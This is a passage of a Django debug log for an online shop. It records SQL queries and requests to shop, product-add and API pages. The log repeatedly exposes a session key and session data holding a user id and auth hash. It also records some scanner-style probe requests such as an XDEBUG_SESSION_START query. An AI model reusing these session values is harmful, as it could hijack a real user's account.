args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 38, 36, 573050, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:38:36] "GET /shop/ HTTP/1.0" 200 2790 DEBUG 2019-12-05 09:38:45,081 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:38:45.071535+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 38, 45, 71535, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:38:45,084 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:38:45,088 utils 28908 140676861576960 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 09:38:45,089 utils 28908 140676861576960 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 09:38:45,097 utils 28908 140676861576960 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-05 09:38:45,167 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:38:45.164864+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 38, 45, 164864, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:38:45] "GET /shop/product/ HTTP/1.0" 200 5417 DEBUG 2019-12-05 09:38:45,436 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:38:45.426745+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 38, 45, 426745, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:38:45,438 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:38:45] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 09:38:49,139 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:38:49.130450+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 38, 49, 130450, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:38:49,142 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:38:49,152 utils 28908 140676861576960 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'product'); args=('shop', 'product') DEBUG 2019-12-05 09:38:49,183 utils 28908 140676861576960 (0.001) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 09:38:49,226 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:38:49.224718+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 38, 49, 224718, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:38:49] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 09:38:49,491 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:38:49.480652+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 38, 49, 480652, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:38:49,495 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:38:49] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 09:42:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 09:48:29] "GET / HTTP/1.0" 302 0 [05/Dec/2019 09:53:31] "GET / HTTP/1.0" 302 0 [05/Dec/2019 09:58:34] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 10:00:03,582 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T10:00:03.572784+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 10, 0, 3, 572784, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 10:00:03,586 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 10:00:03,631 utils 28908 140676861576960 (0.002) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 10:00:03,679 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T10:00:03.677184+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 10, 0, 3, 677184, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 10:00:03] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 10:00:03,991 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T10:00:03.982442+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 10, 0, 3, 982442, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 10:00:03,993 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 10:00:03] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:11:58] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 10:17:00] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:25:09] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:30:12] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:42:40] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:47:43] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:52:46] "GET / HTTP/1.0" 302 0 [05/Dec/2019 10:55:05] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-05 10:55:05,959 utils 28908 140676861576960 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'p08hqic7se2jdddu3ngoncjdrx5dlsn9' LIMIT 1; args=('p08hqic7se2jdddu3ngoncjdrx5dlsn9',) DEBUG 2019-12-05 10:55:05,961 utils 28908 140676861576960 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('p08hqic7se2jdddu3ngoncjdrx5dlsn9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T10:55:05.959668+00:00'::timestamptz); args=('p08hqic7se2jdddu3ngoncjdrx5dlsn9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 10, 55, 5, 959668, tzinfo=)) [05/Dec/2019 10:55:05] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [05/Dec/2019 10:57:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 11:03:35,645 utils 28908 140676861576960 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T11:03:35.630266+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 11, 3, 35, 630266, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 11:03:35,649 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 11:03:35,719 utils 28908 140676861576960 (0.003) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 11:03:35,793 utils 28908 140676861576960 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T11:03:35.789338+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 11, 3, 35, 789338, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 11:03:35] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 11:03:36,063 utils 28908 140676861576960 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T11:03:36.047854+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 11, 3, 36, 47854, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 11:03:36,067 utils 28908 140676861576960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 11:03:36] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:13:45] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:14:56] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:19:58] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:21:45] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 11:21:49,494 utils 28908 140676861576960 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3kq5q0hz7uvy4dofu75eu9un32ouriqm' LIMIT 1; args=('3kq5q0hz7uvy4dofu75eu9un32ouriqm',) DEBUG 2019-12-05 11:21:49,496 utils 28908 140676861576960 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3kq5q0hz7uvy4dofu75eu9un32ouriqm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T11:21:49.494979+00:00'::timestamptz); args=('3kq5q0hz7uvy4dofu75eu9un32ouriqm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 11, 21, 49, 494979, tzinfo=)) [05/Dec/2019 11:21:49] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-12-05 11:22:50,325 utils 28908 140676861576960 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 11:22:50,333 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-05 11:22:50,337 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-05 11:22:50,373 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 11:22:50,376 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-05 11:22:50,395 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T11:22:50.390341+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 11, 22, 50, 390341, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 11:22:50,445 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T11:22:50.443400+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 11, 22, 50, 443400, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 11:22:50] "GET /api/v1/categories/ HTTP/1.0" 200 10258 [05/Dec/2019 11:25:01] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:30:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:43:14] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:48:17] "GET / HTTP/1.0" 302 0 [05/Dec/2019 11:53:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 11:54:31,322 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T11:54:31.314285+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 11, 54, 31, 314285, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 11:54:31,325 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 11:54:31,363 utils 28908 140676861576960 (0.002) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 11:54:31,404 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T11:54:31.402849+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 11, 54, 31, 402849, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 11:54:31] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 11:54:31,683 utils 28908 140676861576960 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T11:54:31.672206+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 11, 54, 31, 672206, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 11:54:31,686 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 11:54:31] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 11:55:15,711 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T11:55:15.700191+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 11, 55, 15, 700191, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 11:55:15,714 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 11:55:15,758 utils 28908 140676861576960 (0.002) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 11:55:15,804 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 